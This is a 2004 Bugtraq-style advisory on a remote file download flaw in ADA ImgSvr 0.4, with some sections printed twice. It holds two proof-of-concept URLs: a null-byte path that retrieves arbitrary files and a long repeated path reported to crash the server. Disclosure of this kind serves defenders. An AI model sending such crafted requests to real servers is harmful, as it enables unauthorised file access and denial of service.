ADA IMGSVR Remote File Download Vulnerability
BID:10027
Info
ADA IMGSVR Remote File Download Vulnerability
| Bugtraq ID: | 10027 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 01 2004 12:00AM |
| Updated: | Apr 01 2004 12:00AM |
| Credit: | Disclosure of this issue is credited to Donato Ferrante <[email protected]> |
| Vulnerable: |
ADA ImgSvr 0.4 |
| Not Vulnerable: | |
Discussion
ADA IMGSVR Remote File Download Vulnerability
A vulnerability has been reported in the ImgSvr server software that may allow a remote user to the retrieve arbitrary files from the web server root directory and any subdirectories therein.
An attacker may leverage this issue to gain access to arbitrary scripts contained within the server root directory.
A vulnerability has been reported in the ImgSvr server software that may allow a remote user to the retrieve arbitrary files from the web server root directory and any subdirectories therein.
An attacker may leverage this issue to gain access to arbitrary scripts contained within the server root directory.
Exploit / POC
ADA IMGSVR Remote File Download Vulnerability
No exploit is required to leverage this issue. The following proof of concept has been provided:
http://www.example.org:1234/someDirectory/fileName%00
The following has been reported to crash the affected server:
http://127.0.0.1:1234/%00/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/
No exploit is required to leverage this issue. The following proof of concept has been provided:
http://www.example.org:1234/someDirectory/fileName%00
The following has been reported to crash the affected server:
http://127.0.0.1:1234/%00/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/
Solution / Fix
ADA IMGSVR Remote File Download Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
ADA IMGSVR Remote File Download Vulnerability
References:
References:
- ImgSvr Home Page (ADA)
- Index viewing in imgSvr 0.4 ("Donato Ferrante"
)